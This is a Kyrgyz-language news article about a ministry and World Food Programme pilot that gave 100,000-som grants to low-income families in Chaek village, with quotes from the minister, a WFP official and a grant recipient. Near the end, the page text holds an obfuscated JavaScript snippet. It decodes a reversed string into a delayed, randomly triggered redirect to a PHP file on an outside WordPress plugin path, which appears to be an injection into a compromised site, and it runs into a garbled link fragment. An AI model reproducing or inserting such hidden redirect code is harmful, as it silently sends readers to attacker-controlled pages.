МУКТАЖ ҮЙ-БҮЛӨЛӨРГӨ ЖАКЫНДАН ЖАРДАМ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 56

Аз камсыз болгон үй-бүлөлөрдүн жашоосун жакшыртууга жакшы мүмкүнчүлүк түзүлдү. Тагыраак айтканда, аларга өзүлөрү жазган бизнес-пландарын ишке ашырууга 100 миң сом өлчөмүндө жардам көрсөтүлдү.

Бул үчүн Эмгек, социалдык камсыздоо жана миграция министрлиги, Бириккен Улуттар Уюмунун Дүйнөлүк азык-түлүк программасы менен биргеликте пилоттук долбоор түзгөн. Бул иштин максаты – элдерди жакырчылыктан алып чыгуу. Анын негизинде Жумгал районунун Чаек айылында долбоорго катышкан тургундардын ичинен тандалып алынган 50 кишинин ар бирине кайтарымсыз 100 миң сомдук гранттар тапшырылды. Алар күнөскана өстүрүү, мал чарбачылык, кол өнөрчүлүк, кийим тигүүчү цех ачуу жана башка ар тармактуу бизнес-пландарды жазышкан.

“- Биз бул долбоорго катышкан жарандын ар бирине кантип ишкер болуусу, кандай кылып иш баштоосу тууралуу окууларды өткөрүп, колдоо көрсөттүк. Мындан ары дагы биздин адистер алардын ишти алып кетүүсүн көзөмөлдөп турушат. Ошондуктан долбоорго катышкандар өзүлөрүнүн жашоосун жакшыртуу менен башкаларга да үлгү болушу керек. Эгерде биздин оюбуз ийгиликтүү ишке ашса, өлкөнүн бардык аймагына жайылтабыз”, — дейт министр.

“- Негизги биздин максат – аз камсыз болгон адамдардын социалдык абалын чечүү. Алар жөлөкпул алып эле отура берсе жашаганга кыйын болот. Долбоор боюнча конкурска катышкан ар бир кишинин иши биздин көзөмөлдө болду. Мындан кийин дагы байкоо жүргүзүп турабыз. Алар үчүн азыр эң жакшы шарт түзүлдү. Биздин үмүтүбүз акталып, натыйжасын берсе дагы кеңейтүү мүмкүнчүлүгүн карайбыз”, — деди Рам Сараваннамутту.

Пилоттук долбоорго катышкандардын саны 200дөн ашкан. Бирок алардын ичинен бир ишти баштоого жана алып кетүүгө шыгы бар адамдар тандалып, окутулган. Алардын бири Самара Асылбекова кийим тигүүчү машина алып, иш баштоону туура көргөн.

“- Мен бул долбоорго катышып калганыма абдан сыймыктанам. Көптөн бери жеке ишкер болсом деп кыялданчумун. Буга чейин мүмкүнчүлүк жок болгондугуна байланыштуу кийим тигүүчү машина ала албай жүргөм. Максатыма жетип, бул машинаны алдым. Эми акырындык менен буюртма алып, ишти баштайм. Бизнес долбоорумда мен жеке ишкер катары “кызга сеп” жасайм деп жазгам. Буюрса бул тилегимди ишке ашырам”.

Самара айым Чаек айылынын тургуну. Анын 4 баласы бар, жолдошу жана бир уулу майып. Учурда жашап жаткан жери да өзүлөрүнүкү эмес. Бирок бул кыйынчылыкка карабай өзүнүн үйүндө эле буюртма алып төшөк, жууркан тигип баштайт. Жетишсиз үй-бүлөлөргө турмуш кыйынчылыгынан чыгаруу үчүн ишке киргизилген долбоор жакыр жашаган адамдарга  чоң колдоо болот деген үмүт бар.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Айтолкун Бадырова

25-февраль, 2022-ж. / Редакция / Жаңылыктар 56
Бөлүшүү: Telegram WhatsApp X